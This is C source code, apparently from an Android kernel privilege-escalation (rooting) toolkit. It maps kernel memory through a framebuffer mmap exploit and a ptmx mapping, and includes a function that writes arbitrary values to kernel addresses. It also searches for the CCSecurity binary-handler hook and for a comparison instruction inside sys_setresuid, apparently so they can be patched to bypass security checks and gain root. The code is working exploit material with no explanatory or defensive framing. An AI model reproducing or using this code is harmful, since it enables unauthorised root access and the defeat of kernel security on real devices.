bool map_kernel_memory(void) { if (!kernel_physical_offset) { if (!setup_variables()) { return false; } } fb_mmap_fd = -1; kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS; if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) { return true; } fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000); printf("Attempt fb_mem_exploit...\n"); fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd); if (fb_mem_mmap_base) { kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base); return true; } fb_mmap_fd = -1; return false; }
static void* find_ccs_search_binary_handler_address_in_ccsecurity_ops(void *mmap_base_address) { unsigned long int ccsecurity_ops = 0; unsigned long int *ccs_search_binary_handlers; int i = 0; void *mapped_ccsecurity_ops; void *found_address = NULL; ccsecurity_ops = kallsyms_in_memory_lookup_name("ccsecurity_ops"); if (!ccsecurity_ops) { return NULL; } ccs_search_binary_handlers = kallsyms_in_memory_lookup_names("__ccs_search_binary_handler"); if (!ccs_search_binary_handlers) { return NULL; } mapped_ccsecurity_ops = fb_mem_convert_to_mmaped_address((void*)ccsecurity_ops, mmap_base_address); while (ccs_search_binary_handlers[i]) { found_address = memmem(mapped_ccsecurity_ops, 0x100, &ccs_search_binary_handlers[i], sizeof(ccs_search_binary_handlers[i])); if (found_address) { break; } i++; } free(ccs_search_binary_handlers); return found_address; }
static bool attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param) { unsigned long int offset; int fd; void *address; bool result; offset = get_kernel_physical_offset(); if (offset) { fb_mem_set_kernel_phys_offset(offset - 0x00008000); } address = fb_mem_mmap(&fd); if (address == MAP_FAILED) { return false; } result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), KERNEL_SIZE, callback_param); fb_mem_munmap(address, fd); return result; }
static void* find_cmp_operation_address_in_sys_setresuid(void *mmap_base_address) { void *mapped_sys_setresuid_address; unsigned long int sys_setresuid_address = 0; sys_setresuid_address = get_sys_setresuid_address_in_memory(mmap_base_address); if (!sys_setresuid_address) { printf("Failed to get sys_setresuid address due to %s\n", strerror(errno)); return NULL; } mapped_sys_setresuid_address = fb_mem_convert_to_mmaped_address((void*)sys_setresuid_address, mmap_base_address); return memmem(mapped_sys_setresuid_address, 0x100, &cmp_operation_code, sizeof(cmp_operation_code)); }
bool fb_mem_write_value_at_address(unsigned long int address, int value) { void *mmap_address = NULL; int *write_address; int fd; mmap_address = fb_mem_mmap(&fd); if (mmap_address == MAP_FAILED) { return false; } write_address = (int*)fb_mem_convert_to_mmaped_address((void*)address, mmap_address); *write_address = value; fb_mem_munmap(mmap_address, fd); return true; }